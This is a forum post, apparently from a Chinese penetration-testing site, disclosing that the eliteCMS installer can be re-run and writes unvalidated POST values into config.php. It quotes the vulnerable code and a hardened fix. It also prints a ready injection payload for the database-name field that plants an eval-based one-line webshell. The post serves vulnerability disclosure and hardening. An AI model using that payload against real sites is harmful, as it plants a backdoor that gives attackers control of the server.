中国网络渗透测试联盟

Title: eliteCMS installer not re-verified + one-line webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation by visiting the installer URL.

The other vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:
```php
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated straight into the PHP source being generated
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated source is written to config.php as-is
    $writer = fopen($file, 'w');
...
```
Now look at this code:

```php
// The POSTed values are copied into the session without any validation
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
```
The values are not validated at all.

If the database name sent in the POST data is:

```
"?><?php eval($_POST[c]);?><?php
```

a one-line backdoor will be written into /admin/includes/config.php.
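A hardened version of that installer step, added here as an example (not eliteCMS's own code): it refuses to run once a lock file exists, validates the database name as an identifier, and emits every setting through var_export() so a value can never close the string or the PHP tag of the generated file. The file and function names are assumptions.

```php
<?php
// Added example, not eliteCMS code: hardened step-4 config writer.
// File names and function names are assumptions.
// Refuse to run once a lock file exists, so the installer cannot be re-run.
function install_is_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

// Emit each setting as a proper PHP string literal instead of interpolating it
// into source text, so a value can never close the string or the PHP tag.
function build_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        if (!isset($settings[$key]) || !is_string($settings[$key])) {
            throw new InvalidArgumentException("missing setting: $key");
        }
        // A database name is an identifier; anything outside this set is rejected
        // before it gets anywhere near the generated file.
        if ($key === 'DB_NAME' && !preg_match('/^[A-Za-z0-9_]{1,64}$/', $settings[$key])) {
            throw new InvalidArgumentException("invalid database name");
        }
        // var_export() yields a single-quoted literal with ' and \ escaped,
        // so "?><?php ..." inside a password stays inert data.
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export($settings[$key], true) . ");\n";
    }
    return $out;
}

function write_config(string $file, string $lockFile, array $settings): void
{
    if (install_is_locked($lockFile)) {
        throw new RuntimeException("installer already ran; delete $lockFile to reinstall");
    }
    if (file_put_contents($file, build_config($settings), LOCK_EX) === false) {
        throw new RuntimeException("could not write $file");
    }
    touch($lockFile); // create the lock last, so a failed write leaves no stale lock
}

// Constructed input using the payload quoted in the post as the database name:
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => '?><?php eval($_POST[c]);?><?php',
                  'DB_USER' => 'app', 'DB_PASS' => 'secret']);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

With the constructed input the name is rejected before any file is touched; a legitimate name passes and the generated define() lines carry properly escaped literals.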
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2